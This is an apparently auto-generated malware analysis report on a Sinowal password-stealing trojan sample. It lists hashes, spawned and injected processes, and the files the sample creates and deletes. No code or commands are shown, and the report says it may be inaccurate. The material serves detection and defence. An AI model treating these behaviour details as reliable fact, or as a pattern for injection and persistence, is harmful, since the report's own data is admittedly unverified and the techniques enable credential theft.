Sinowal_e278feec31

by malwarelabrobot on September 21st, 2015 in Malware Descriptions.

Susp_Dropper (Kaspersky), Trojan.Win32.Swrort.3.FD, mzpefinder_pcap_file.YR, Sinowal.YR, GenericInjector.YR, BackdoorCaphaw_QKKBAL.YR, TrojanPSWZbot.YR (Lavasoft MAS)
Behaviour: Trojan-PSW, Trojan, Backdoor


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: e278feec31e3ed63cbe4a7d85517daea
SHA1: 040894a3e4f22f3189a850ff0a36c4c1ad63067d
SHA256: dc864301b3ed3e0fd2be94326b3fb581d1c627ef65247d5cfd8e8174ec1612f5
SSDeep: 6144:Yykr06hjRDWkYTZkdmqSymbyDGT5cM5RkgB809T3pU03HW2:YLr06nWkW8kymsGPqgz9Ty03HJ
Size: 269312 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: BorlandDelphi30, UPolyXv05_v6
Company: no certificate found
Created at: 2015-08-12 17:32:56
Analyzed on: WindowsXP SP3 32-bit


Summary:

Trojan-PSW. Trojan program intended for stealing users passwords.

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

%original file name%.exe:1480
mofcomp.exe:3476
WindowsXP-KB968930-x86-ENG.exe:3964
new.exe:3064
net1.exe:2460
tasklist.exe:2264
ngen.exe:3596
ngen.exe:3168
ngen.exe:3676
ngen.exe:3300
ngen.exe:856
ngen.exe:2988
ngen.exe:3172
ngen.exe:1960
ngen.exe:1944
ngen.exe:420
ngen.exe:916
ngen.exe:3936
ngen.exe:3996
ngen.exe:1868
ngen.exe:2188
ngen.exe:2952
ngen.exe:3560
ngen.exe:3224
ngen.exe:1724
ngen.exe:3220
ngen.exe:1976
ngen.exe:2164
ngen.exe:648
update.exe:4040
net.exe:2156
net.exe:2224
net.exe:2416
hostname.exe:1384
PSCustomSetupUtil.exe:620
PSCustomSetupUtil.exe:452
PSCustomSetupUtil.exe:3908
PSCustomSetupUtil.exe:1924
PSCustomSetupUtil.exe:2196
PSCustomSetupUtil.exe:3064
PSCustomSetupUtil.exe:2308
PSCustomSetupUtil.exe:2224
PSCustomSetupUtil.exe:3696
PSCustomSetupUtil.exe:3856
PSCustomSetupUtil.exe:2176
PSCustomSetupUtil.exe:2244
PSCustomSetupUtil.exe:2112
PSCustomSetupUtil.exe:2240
PSCustomSetupUtil.exe:3992
PSCustomSetupUtil.exe:2288
PSCustomSetupUtil.exe:2344
PSCustomSetupUtil.exe:3952
PSCustomSetupUtil.exe:2552
PSCustomSetupUtil.exe:1496
PSCustomSetupUtil.exe:264
PSCustomSetupUtil.exe:1868
PSCustomSetupUtil.exe:1284
PSCustomSetupUtil.exe:2332
PSCustomSetupUtil.exe:2556
PSCustomSetupUtil.exe:2140
ipconfig.exe:1240
yfenaromaf.exe:1664
PSSetupNativeUtils.exe:1932
mscorsvw.exe:4008
mscorsvw.exe:3128
mscorsvw.exe:2592
mscorsvw.exe:2732
mscorsvw.exe:3104
mscorsvw.exe:2284
mscorsvw.exe:3484
mscorsvw.exe:2168
mscorsvw.exe:2072
mscorsvw.exe:3084
mscorsvw.exe:2408
mscorsvw.exe:828
regsvr32.exe:3404
regsvr32.exe:3200
wsmanhttpconfig.exe:3232
wsmanhttpconfig.exe:1960
netsh.exe:2304
bindata865.exe:3088

The Trojan injects its code into the following process(es):

new.exe:3664
regsvr32.exe:3384
regsvr32.exe:3264
Explorer.EXE:1572

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process %original file name%.exe:1480 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Application Data\Olifiqtu\yfenaromaf.exe (269 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\tmp1.tmp (4545 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\tmp2.tmp (7385 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\tmpfa60f4ad.bat (177 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\tmp1.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\tmp2.tmp (0 bytes)

The process mofcomp.exe:3476 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%System%\wbem\Logs\mofcomp.log (1814 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\tmpD4.tmp (1 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\tmpD4.tmp (0 bytes)

The process WindowsXP-KB968930-x86-ENG.exe:3964 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\ea4acb66495575d6b9f323\powershell_ise.exe (2526 bytes)
C:\ea4acb66495575d6b9f323\about_transactions.help.txt (1011 bytes)
C:\ea4acb66495575d6b9f323\about_format.ps1xml.help.txt (17 bytes)
C:\ea4acb66495575d6b9f323\wsmplpxy.dll (603 bytes)
C:\ea4acb66495575d6b9f323\windowsremoteshell.adm (12 bytes)
C:\ea4acb66495575d6b9f323\pscustomsetuputil.exe (316 bytes)
C:\ea4acb66495575d6b9f323\about_jobs.help.txt (12 bytes)
C:\ea4acb66495575d6b9f323\$shtdwn$.req (788 bytes)
C:\ea4acb66495575d6b9f323\powershell.exe (7339 bytes)
C:\ea4acb66495575d6b9f323\update\updspapi.dll (5940 bytes)
C:\ea4acb66495575d6b9f323\about_command_syntax.help.txt (5 bytes)
C:\ea4acb66495575d6b9f323\about_bits_cmdlets.help.txt (7 bytes)
C:\ea4acb66495575d6b9f323\microsoft.powershell.commands.diagnostics.dll (998 bytes)
C:\ea4acb66495575d6b9f323\importallmodules.psd1 (438 bytes)
C:\ea4acb66495575d6b9f323\about_functions_advanced.help.txt (3 bytes)
C:\ea4acb66495575d6b9f323\winrm.vbs (2727 bytes)
C:\ea4acb66495575d6b9f323\microsoft.powershell.consolehost.dll-help.xml (900 bytes)
C:\ea4acb66495575d6b9f323\update\update.exe (10748 bytes)
C:\ea4acb66495575d6b9f323\about_job_details.help.txt (824 bytes)
C:\ea4acb66495575d6b9f323\bitstransfer.psd1 (950 bytes)
C:\ea4acb66495575d6b9f323\about_locations.help.txt (794 bytes)
C:\ea4acb66495575d6b9f323\about_comparison_operators.help.txt (11 bytes)
C:\ea4acb66495575d6b9f323\wsmauto.dll (1842 bytes)
C:\ea4acb66495575d6b9f323\about_return.help.txt (3 bytes)
C:\ea4acb66495575d6b9f323\spuninst.exe (3787 bytes)
C:\ea4acb66495575d6b9f323\about_remote.help.txt (7 bytes)
C:\ea4acb66495575d6b9f323\wevtfwd.dll (3351 bytes)
C:\ea4acb66495575d6b9f323\about_wmi_cmdlets.help.txt (8 bytes)
C:\ea4acb66495575d6b9f323\system.management.automation.dll-help.xml (16567 bytes)
C:\ea4acb66495575d6b9f323\about_functions_advanced_parameters.help.txt (962 bytes)
C:\ea4acb66495575d6b9f323\about_arrays.help.txt (8 bytes)
C:\ea4acb66495575d6b9f323\about_trap.help.txt (10 bytes)
C:\ea4acb66495575d6b9f323\about_pssession_details.help.txt (9 bytes)
C:\ea4acb66495575d6b9f323\microsoft.backgroundintelligenttransfer.management.resources.dll (7 bytes)
C:\ea4acb66495575d6b9f323\about_break.help.txt (792 bytes)
C:\ea4acb66495575d6b9f323\registry.format.ps1xml (20 bytes)
C:\ea4acb66495575d6b9f323\spmsg.dll (495 bytes)
C:\ea4acb66495575d6b9f323\filesystem.format.ps1xml (133 bytes)
C:\ea4acb66495575d6b9f323\microsoft.powershell.consolehost.dll (3118 bytes)
C:\ea4acb66495575d6b9f323\diagnostics.format.ps1xml (590 bytes)
C:\ea4acb66495575d6b9f323\about_redirection.help.txt (2 bytes)
C:\ea4acb66495575d6b9f323\microsoft.powershell.commands.utility.dll-help.xml (20810 bytes)
C:\ea4acb66495575d6b9f323\about_aliases.help.txt (6 bytes)
C:\ea4acb66495575d6b9f323\about_operators.help.txt (770 bytes)
C:\ea4acb66495575d6b9f323\microsoft.backgroundintelligenttransfer.management.dll-help.xml (2472 bytes)
C:\ea4acb66495575d6b9f323\about_throw.help.txt (5 bytes)
C:\ea4acb66495575d6b9f323\microsoft.powershell.gpowershell.dll (9738 bytes)
C:\ea4acb66495575d6b9f323\about_debuggers.help.txt (21 bytes)
C:\ea4acb66495575d6b9f323\wsmwmipl.dll (2816 bytes)
C:\ea4acb66495575d6b9f323\about_windows_powershell_2.0.help.txt (453 bytes)
C:\ea4acb66495575d6b9f323\wsmtxt.xsl (2 bytes)
C:\ea4acb66495575d6b9f323\winrm.cmd (35 bytes)
C:\ea4acb66495575d6b9f323\about_split.help.txt (10 bytes)
C:\ea4acb66495575d6b9f323\compiledcomposition.microsoft.powershell.gpowershell.dll (1737 bytes)
C:\ea4acb66495575d6b9f323\microsoft.powershell.commands.utility.resources.dll (508 bytes)
C:\ea4acb66495575d6b9f323\about_history.help.txt (3 bytes)
C:\ea4acb66495575d6b9f323\microsoft.wsman.management.resources.dll (13 bytes)
C:\ea4acb66495575d6b9f323\about_regular_expressions.help.txt (5 bytes)
C:\ea4acb66495575d6b9f323\wsman.format.ps1xml (837 bytes)
C:\ea4acb66495575d6b9f323\about_properties.help.txt (7 bytes)
C:\ea4acb66495575d6b9f323\pwrshplugin.dll (802 bytes)
C:\ea4acb66495575d6b9f323\powershelltrace.format.ps1xml (344 bytes)
C:\ea4acb66495575d6b9f323\microsoft.powershell.commands.management.resources.dll (508 bytes)
C:\ea4acb66495575d6b9f323\about_types.ps1xml.help.txt (481 bytes)
C:\ea4acb66495575d6b9f323\about_signing.help.txt (12 bytes)
C:\ea4acb66495575d6b9f323\about_do.help.txt (2 bytes)
C:\ea4acb66495575d6b9f323\winrm.ini (1956 bytes)
C:\ea4acb66495575d6b9f323\about_script_internationalization.help.txt (9 bytes)
C:\ea4acb66495575d6b9f323\microsoft.wsman.management.dll-help.xml (8740 bytes)
C:\ea4acb66495575d6b9f323\help.format.ps1xml (3947 bytes)
C:\$Directory (800 bytes)
C:\ea4acb66495575d6b9f323\about_windows_powershell_ise.help.txt (6 bytes)
C:\ea4acb66495575d6b9f323\about_arithmetic_operators.help.txt (168 bytes)
C:\ea4acb66495575d6b9f323\about_escape_characters.help.txt (2 bytes)
C:\ea4acb66495575d6b9f323\microsoft.powershell.editor.dll (14450 bytes)
C:\ea4acb66495575d6b9f323\winrshost.exe (22 bytes)
C:\ea4acb66495575d6b9f323\about_remote_output.help.txt (887 bytes)
C:\ea4acb66495575d6b9f323\about_pipelines.help.txt (411 bytes)
C:\ea4acb66495575d6b9f323\microsoft.backgroundintelligenttransfer.management.interop.dll (1532 bytes)
C:\ea4acb66495575d6b9f323\system.management.automation.dll (38414 bytes)
C:\ea4acb66495575d6b9f323\about_remote_jobs.help.txt (13 bytes)
C:\ea4acb66495575d6b9f323\winrsmgr.dll (2 bytes)
C:\ea4acb66495575d6b9f323\wsmprovhost.exe (657 bytes)
C:\ea4acb66495575d6b9f323\about_functions_cmdletbindingattribute.help.txt (3 bytes)
C:\ea4acb66495575d6b9f323\microsoft.backgroundintelligenttransfer.management.dll (1537 bytes)
C:\ea4acb66495575d6b9f323\microsoft.powershell.graphicalhost.dll (4408 bytes)
C:\ea4acb66495575d6b9f323\about_assignment_operators.help.txt (379 bytes)
C:\ea4acb66495575d6b9f323\microsoft.powershell.gpowershell.resources.dll (408 bytes)
C:\ea4acb66495575d6b9f323\windowspowershellhelp.chm (26041 bytes)
C:\ea4acb66495575d6b9f323\about_functions.help.txt (586 bytes)
C:\ea4acb66495575d6b9f323\about_providers.help.txt (59 bytes)
C:\ea4acb66495575d6b9f323\wsmsvc.dll (15909 bytes)
C:\ea4acb66495575d6b9f323\about_type_operators.help.txt (5 bytes)
C:\ea4acb66495575d6b9f323\about_preference_variables.help.txt (37 bytes)
C:\ea4acb66495575d6b9f323\about_eventlogs.help.txt (5 bytes)
C:\ea4acb66495575d6b9f323\about_commonparameters.help.txt (12 bytes)
C:\ea4acb66495575d6b9f323\certificate.format.ps1xml (155 bytes)
C:\ea4acb66495575d6b9f323\about_comment_based_help.help.txt (595 bytes)
C:\ea4acb66495575d6b9f323\about_command_precedence.help.txt (8 bytes)
C:\ea4acb66495575d6b9f323\about_profiles.help.txt (457 bytes)
C:\ea4acb66495575d6b9f323\bitstransfer.format.ps1xml (16 bytes)
C:\ea4acb66495575d6b9f323\microsoft.powershell.security.dll (1145 bytes)
C:\ea4acb66495575d6b9f323\powershell.exe.mui (10 bytes)
C:\ea4acb66495575d6b9f323\about_for.help.txt (146 bytes)
C:\ea4acb66495575d6b9f323\winrs.exe (1154 bytes)
C:\ea4acb66495575d6b9f323\about_prompts.help.txt (7 bytes)
C:\ea4acb66495575d6b9f323\winrssrv.dll (12 bytes)
C:\ea4acb66495575d6b9f323\about_remote_troubleshooting.help.txt (146 bytes)
C:\ea4acb66495575d6b9f323\pwrshsip.dll (24 bytes)
C:\ea4acb66495575d6b9f323\about_try_catch_finally.help.txt (7 bytes)
C:\ea4acb66495575d6b9f323\microsoft.powershell.commands.management.dll (3386 bytes)
C:\ea4acb66495575d6b9f323\about_parsing.help.txt (2 bytes)
C:\ea4acb66495575d6b9f323\about_automatic_variables.help.txt (14 bytes)
C:\ea4acb66495575d6b9f323\microsoft.wsman.management.dll (5010 bytes)
C:\ea4acb66495575d6b9f323\update\spcustom.dll (23 bytes)
C:\ea4acb66495575d6b9f323\about_pssnapins.help.txt (6 bytes)
C:\ea4acb66495575d6b9f323\microsoft.powershell.commands.diagnostics.resources.dll (470 bytes)
C:\ea4acb66495575d6b9f323\about_objects.help.txt (2 bytes)
C:\ea4acb66495575d6b9f323\about_quoting_rules.help.txt (659 bytes)
C:\ea4acb66495575d6b9f323\wsmres.dll (6164 bytes)
C:\ea4acb66495575d6b9f323\update (4 bytes)
C:\ea4acb66495575d6b9f323\about_remote_requirements.help.txt (6 bytes)
C:\ea4acb66495575d6b9f323\about_switch.help.txt (489 bytes)
C:\ea4acb66495575d6b9f323\about_methods.help.txt (6 bytes)
C:\ea4acb66495575d6b9f323\wsmpty.xsl (1 bytes)
C:\ea4acb66495575d6b9f323\about_language_keywords.help.txt (11 bytes)
C:\ea4acb66495575d6b9f323\update\eula.txt (586 bytes)
C:\ea4acb66495575d6b9f323\about_ws-management_cmdlets.help.txt (405 bytes)
C:\ea4acb66495575d6b9f323\microsoft.powershell.editor.resources.dll (562 bytes)
C:\ea4acb66495575d6b9f323\default.help.txt (2 bytes)
C:\ea4acb66495575d6b9f323\getevent.types.ps1xml (15 bytes)
C:\ea4acb66495575d6b9f323\about_continue.help.txt (1 bytes)
C:\ea4acb66495575d6b9f323\about_logical_operators.help.txt (2 bytes)
C:\ea4acb66495575d6b9f323\microsoft.wsman.runtime.dll (33 bytes)
C:\ea4acb66495575d6b9f323\profile.ps1 (772 bytes)
C:\ea4acb66495575d6b9f323\about_script_blocks.help.txt (3 bytes)
C:\ea4acb66495575d6b9f323\microsoft.powershell.security.dll-help.xml (1797 bytes)
C:\ea4acb66495575d6b9f323\spupdsvc.exe (287 bytes)
C:\ea4acb66495575d6b9f323\about_session_configurations.help.txt (276 bytes)
C:\ea4acb66495575d6b9f323\microsoft.powershell.consolehost.resources.dll (778 bytes)
C:\ea4acb66495575d6b9f323\about_scripts.help.txt (12 bytes)
C:\ea4acb66495575d6b9f323\microsoft.powershell.commands.utility.dll (9684 bytes)
C:\ea4acb66495575d6b9f323\eventforwarding.adm (2 bytes)
C:\ea4acb66495575d6b9f323\about_foreach.help.txt (10 bytes)
C:\ea4acb66495575d6b9f323\about_execution_policies.help.txt (13 bytes)
C:\ea4acb66495575d6b9f323\powershellcore.format.ps1xml (1492 bytes)
C:\ea4acb66495575d6b9f323\winrmprov.dll (591 bytes)
C:\ea4acb66495575d6b9f323\dotnettypes.format.ps1xml (266 bytes)
C:\ea4acb66495575d6b9f323\about_join.help.txt (2 bytes)
C:\ea4acb66495575d6b9f323\about_ref.help.txt (1 bytes)
C:\ea4acb66495575d6b9f323\winrscmd.dll (2907 bytes)
C:\ea4acb66495575d6b9f323\microsoft.powershell.commands.diagnostics.dll-help.xml (2301 bytes)
C:\ea4acb66495575d6b9f323\about_special_characters.help.txt (3 bytes)
C:\ea4acb66495575d6b9f323\types.ps1xml (2510 bytes)
C:\ea4acb66495575d6b9f323\microsoft.powershell.commands.management.dll-help.xml (28236 bytes)
C:\ea4acb66495575d6b9f323\about_while.help.txt (2 bytes)
C:\ea4acb66495575d6b9f323\windowsremotemanagement.adm (574 bytes)
C:\ea4acb66495575d6b9f323\about_hash_tables.help.txt (6 bytes)
C:\ea4acb66495575d6b9f323\about_wildcards.help.txt (3 bytes)
C:\ea4acb66495575d6b9f323\about_reserved_words.help.txt (1 bytes)
C:\ea4acb66495575d6b9f323\wsmanhttpconfig.exe (3009 bytes)
C:\ea4acb66495575d6b9f323\update\update.inf (2457 bytes)
C:\ea4acb66495575d6b9f323\system.management.automation.resources.dll (3153 bytes)
C:\ea4acb66495575d6b9f323\pssetupnativeutils.exe (9 bytes)
C:\ea4acb66495575d6b9f323\microsoft.powershell.security.resources.dll (9 bytes)
C:\ea4acb66495575d6b9f323\powershell_ise.resources.dll (4 bytes)
C:\ea4acb66495575d6b9f323\about_functions_advanced_methods.help.txt (9 bytes)
C:\ea4acb66495575d6b9f323\wtrinstaller.ico (4803 bytes)
C:\ea4acb66495575d6b9f323\about_environment_variables.help.txt (417 bytes)
C:\ea4acb66495575d6b9f323\update\kb968930xp.cat (512 bytes)
C:\ea4acb66495575d6b9f323\about_remote_faq.help.txt (775 bytes)
C:\ea4acb66495575d6b9f323\about_variables.help.txt (6 bytes)
C:\ea4acb66495575d6b9f323\update\update.ver (14 bytes)
C:\ea4acb66495575d6b9f323\about_data_sections.help.txt (5 bytes)
C:\ea4acb66495575d6b9f323\microsoft.powershell.graphicalhost.resources.dll (16 bytes)
C:\ea4acb66495575d6b9f323\winrmprov.mof (789 bytes)
C:\ea4acb66495575d6b9f323\about_requires.help.txt (2 bytes)
C:\ea4acb66495575d6b9f323\wsmauto.mof (4 bytes)
C:\ea4acb66495575d6b9f323\about_line_editing.help.txt (1 bytes)
C:\ea4acb66495575d6b9f323\about_core_commands.help.txt (221 bytes)
C:\ea4acb66495575d6b9f323\about_path_syntax.help.txt (5 bytes)
C:\ea4acb66495575d6b9f323\about_scopes.help.txt (76 bytes)
C:\ea4acb66495575d6b9f323\pspluginwkr.dll (1756 bytes)
C:\ea4acb66495575d6b9f323\about_modules.help.txt (13 bytes)
C:\ea4acb66495575d6b9f323\about_if.help.txt (3 bytes)
C:\ea4acb66495575d6b9f323\about_pssessions.help.txt (9 bytes)
C:\ea4acb66495575d6b9f323\pwrshmsg.dll (4 bytes)
C:\ea4acb66495575d6b9f323\about_parameters.help.txt (9 bytes)

The Trojan deletes the following file(s):

C:\ea4acb66495575d6b9f323\about_transactions.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\powershell_ise.exe (0 bytes)
C:\ea4acb66495575d6b9f323\about_format.ps1xml.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\wsmplpxy.dll (0 bytes)
C:\ea4acb66495575d6b9f323\windowsremoteshell.adm (0 bytes)
C:\ea4acb66495575d6b9f323\pscustomsetuputil.exe (0 bytes)
C:\ea4acb66495575d6b9f323\about_return.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\powershell.exe (0 bytes)
C:\ea4acb66495575d6b9f323\update\updspapi.dll (0 bytes)
C:\ea4acb66495575d6b9f323\about_command_syntax.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\about_bits_cmdlets.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\microsoft.powershell.commands.diagnostics.dll (0 bytes)
C:\ea4acb66495575d6b9f323\importallmodules.psd1 (0 bytes)
C:\ea4acb66495575d6b9f323\about_functions_advanced.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\winrm.vbs (0 bytes)
C:\ea4acb66495575d6b9f323\microsoft.powershell.consolehost.dll-help.xml (0 bytes)
C:\ea4acb66495575d6b9f323\microsoft.wsman.management.dll-help.xml (0 bytes)
C:\ea4acb66495575d6b9f323\microsoft.powershell.commands.management.resources.dll (0 bytes)
C:\ea4acb66495575d6b9f323\about_job_details.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\microsoft.powershell.commands.management.dll (0 bytes)
C:\ea4acb66495575d6b9f323\bitstransfer.psd1 (0 bytes)
C:\ea4acb66495575d6b9f323\about_locations.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\getevent.types.ps1xml (0 bytes)
C:\ea4acb66495575d6b9f323\wsmauto.dll (0 bytes)
C:\ea4acb66495575d6b9f323\about_jobs.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\spuninst.exe (0 bytes)
C:\ea4acb66495575d6b9f323\about_session_configurations.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\pssetupnativeutils.exe (0 bytes)
C:\ea4acb66495575d6b9f323\about_wmi_cmdlets.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\system.management.automation.dll-help.xml (0 bytes)
C:\ea4acb66495575d6b9f323\about_functions_advanced_parameters.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\about_arrays.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\about_trap.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\about_pssession_details.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\about_path_syntax.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\about_break.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\registry.format.ps1xml (0 bytes)
C:\ea4acb66495575d6b9f323\microsoft.backgroundintelligenttransfer.management.resources.dll (0 bytes)
C:\ea4acb66495575d6b9f323\filesystem.format.ps1xml (0 bytes)
C:\ea4acb66495575d6b9f323\about_functions_advanced_methods.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\microsoft.powershell.consolehost.dll (0 bytes)
C:\ea4acb66495575d6b9f323\about_throw.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\about_redirection.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\microsoft.powershell.commands.utility.dll-help.xml (0 bytes)
C:\ea4acb66495575d6b9f323\about_regular_expressions.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\microsoft.backgroundintelligenttransfer.management.dll-help.xml (0 bytes)
C:\ea4acb66495575d6b9f323\diagnostics.format.ps1xml (0 bytes)
C:\ea4acb66495575d6b9f323\microsoft.powershell.gpowershell.dll (0 bytes)
C:\ea4acb66495575d6b9f323\about_debuggers.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\wsmwmipl.dll (0 bytes)
C:\ea4acb66495575d6b9f323\about_windows_powershell_2.0.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\wsmtxt.xsl (0 bytes)
C:\ea4acb66495575d6b9f323\winrm.cmd (0 bytes)
C:\ea4acb66495575d6b9f323\about_split.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\compiledcomposition.microsoft.powershell.gpowershell.dll (0 bytes)
C:\ea4acb66495575d6b9f323\microsoft.powershell.commands.utility.resources.dll (0 bytes)
C:\ea4acb66495575d6b9f323\spmsg.dll (0 bytes)
C:\ea4acb66495575d6b9f323\about_history.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\about_environment_variables.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\about_aliases.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\wsman.format.ps1xml (0 bytes)
C:\ea4acb66495575d6b9f323\about_properties.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\about_wildcards.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\powershelltrace.format.ps1xml (0 bytes)
C:\ea4acb66495575d6b9f323\microsoft.powershell.commands.utility.dll (0 bytes)
C:\ea4acb66495575d6b9f323\about_signing.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\about_do.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\winrm.ini (0 bytes)
C:\ea4acb66495575d6b9f323\about_script_internationalization.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\update\update.exe (0 bytes)
C:\ea4acb66495575d6b9f323\help.format.ps1xml (0 bytes)
C:\ea4acb66495575d6b9f323\about_arithmetic_operators.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\about_escape_characters.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\about_remote_output.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\winrshost.exe (0 bytes)
C:\ea4acb66495575d6b9f323\microsoft.wsman.management.dll (0 bytes)
C:\ea4acb66495575d6b9f323\microsoft.powershell.editor.dll (0 bytes)
C:\ea4acb66495575d6b9f323\about_pipelines.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\powershell.exe.mui (0 bytes)
C:\ea4acb66495575d6b9f323\system.management.automation.dll (0 bytes)
C:\ea4acb66495575d6b9f323\about_remote_jobs.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\about_parsing.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\wsmprovhost.exe (0 bytes)
C:\ea4acb66495575d6b9f323\microsoft.powershell.consolehost.resources.dll (0 bytes)
C:\ea4acb66495575d6b9f323\microsoft.powershell.graphicalhost.dll (0 bytes)
C:\ea4acb66495575d6b9f323\about_assignment_operators.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\microsoft.powershell.commands.diagnostics.dll-help.xml (0 bytes)
C:\ea4acb66495575d6b9f323\types.ps1xml (0 bytes)
C:\ea4acb66495575d6b9f323\about_functions.help.txt (0 bytes)
C:\_521718_ (0 bytes)
C:\ea4acb66495575d6b9f323\about_providers.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\wsmsvc.dll (0 bytes)
C:\ea4acb66495575d6b9f323\about_type_operators.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\about_preference_variables.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\microsoft.backgroundintelligenttransfer.management.dll (0 bytes)
C:\ea4acb66495575d6b9f323\pwrshsip.dll (0 bytes)
C:\ea4acb66495575d6b9f323\about_commonparameters.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\certificate.format.ps1xml (0 bytes)
C:\ea4acb66495575d6b9f323\about_comment_based_help.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\wevtfwd.dll (0 bytes)
C:\ea4acb66495575d6b9f323\about_command_precedence.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\about_profiles.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\bitstransfer.format.ps1xml (0 bytes)
C:\ea4acb66495575d6b9f323\microsoft.powershell.security.dll (0 bytes)
C:\ea4acb66495575d6b9f323\microsoft.backgroundintelligenttransfer.management.interop.dll (0 bytes)
C:\ea4acb66495575d6b9f323\about_for.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\winrs.exe (0 bytes)
C:\ea4acb66495575d6b9f323\about_prompts.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\winrssrv.dll (0 bytes)
C:\ea4acb66495575d6b9f323\about_remote_troubleshooting.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\about_eventlogs.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\about_try_catch_finally.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\about_special_characters.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\winrsmgr.dll (0 bytes)
C:\ea4acb66495575d6b9f323\about_automatic_variables.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\about_windows_powershell_ise.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\update\spcustom.dll (0 bytes)
C:\ea4acb66495575d6b9f323\about_pssnapins.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\microsoft.powershell.commands.diagnostics.resources.dll (0 bytes)
C:\ea4acb66495575d6b9f323\about_objects.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\winrscmd.dll (0 bytes)
C:\ea4acb66495575d6b9f323\update (0 bytes)
C:\ea4acb66495575d6b9f323\about_remote_requirements.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\about_switch.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\about_methods.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\wsmpty.xsl (0 bytes)
C:\ea4acb66495575d6b9f323\about_language_keywords.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\update\eula.txt (0 bytes)
C:\ea4acb66495575d6b9f323\about_ws-management_cmdlets.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\microsoft.powershell.editor.resources.dll (0 bytes)
C:\ea4acb66495575d6b9f323\default.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\about_comparison_operators.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\about_continue.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\about_logical_operators.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\microsoft.wsman.runtime.dll (0 bytes)
C:\ea4acb66495575d6b9f323\profile.ps1 (0 bytes)
C:\ea4acb66495575d6b9f323\about_script_blocks.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\microsoft.powershell.security.dll-help.xml (0 bytes)
C:\ea4acb66495575d6b9f323\spupdsvc.exe (0 bytes)
C:\ea4acb66495575d6b9f323\about_remote.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\about_types.ps1xml.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\about_scripts.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\microsoft.wsman.management.resources.dll (0 bytes)
C:\ea4acb66495575d6b9f323\eventforwarding.adm (0 bytes)
